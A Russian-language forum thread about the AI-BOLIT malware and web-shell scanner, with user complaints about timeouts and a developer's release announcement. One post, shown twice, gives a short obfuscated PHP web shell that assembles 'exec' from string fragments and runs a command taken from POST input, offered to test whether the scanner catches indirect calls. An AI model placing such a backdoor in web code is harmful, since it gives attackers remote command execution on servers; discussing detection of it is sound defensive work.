Скрипт для поиска шеллов и другого вредоносного по

спасибо, заработало..жаль выдало 504 Gateway Time-out

придется через ssh мучаться

Через ssh на виртуальном хостинге тоже скорее всего обрубят. Если на VDS/VPS - то отработает. Поэтому старый добрый проверенный вариант на локалке http://www.revisium.com/kb/scan_site_windows.html

///delete///

на локалке не хочет че то

выдает аткое при установке php сборки под Windows

И причём тут сабжевый скрипт?!

Хорош топик зафлуживать - руки вначале выпрямляй. Или обращайся к специалистам для проверки сайта.

Скрипт для тех кто умеет читать хелпы и понимает что с ним делать, а не для неумеющих даже поставить ПО под винду.

по ставить на винду умею..но тут По просто выебывается

а хелпа я нормального не нашел по скрипту..все поверхностно описано

причем тут сабжевый скрипт? при том что на локалке чтоб проверить надо установить по которое не рабоатет нихрена

По-моему "скрипт для поиска шеллов" это достаточно сложная штука. Например такой шелл он найдет?

$a = 'ex';
$b = 'ec';
$c = $a.$b;
$d = '_PO';
$e = 'ST';
$f = $d.$e;
$g = $$f;
$c($g['q']);

$a = 'ex';

$b = 'ec';

$c = $a.$b;

$d = '_PO';

$e = 'ST';

$f = $d.$e;

$g = $$f;

$c($g['q']);

Никто не утверждает, что написать сканер - это легко ). Вот мы уже три года его пишем, постоянно улучшая.

Свежая версия определяет в режиме "параноидальный" том числе и такие шеллы. Думаю, AI-BOLIT - единственный сканер, который умеет определять вредоносный код в косвенных вызовах.

Конечно, всегда можно придумать вариант, который не будет детектится. Но у разработчиков вредоносного кода не всегда богатая фантазия. Да и мы постоянно расширяем базу сигнатур.

Выпустили новую версию сканера вредоносного кода AI-BOLIT.

Основная цель, которую преследовали в данном релизе сканера - более точное определение вредоносных скриптов при меньшем числе ложных срабатываний. Для этого мы переработали базу "вредоносов" и добавили еще один режим сканирования - "параноидальный" - который рекомендуется использовать при лечении сайта.

Что нового в версии 20140612:

- Переработана база сигнатур, минимизировано число ложных срабатываний

- Три режима работы "обычный" (AI_EXPERT = 0), "эксперт" (AI_EXPERT = 1), "параноидальный" (AI_EXPERT = 2)

- Добавлены .aknown файлы для wordpress 3.9.1, joomla 3.3.1 / 2.5.21, dle 10.2

- Традиционно добавлено большое число новых сигнатуры вирусов и хакерских скриптов

- Исправлено несколько ошибок, оптимизирована работа скрипта

Скачать скрипт можно на странице: http://revisium.com/ai/

Полный список возможностей скрипта смотрите на странице http://www.revisium.com/ru/blog/AI-BOLIT-features_list.html

Сканер AI-Bolit является самым эффективным инструментом для поиска вредоносного кода на хостинге.

Через браузер 504.

В консоли:

Как лечить?

Пробовал и памяти гиг давать в php.ini и время увеличивать и размеры запросов, ошибка не меняется.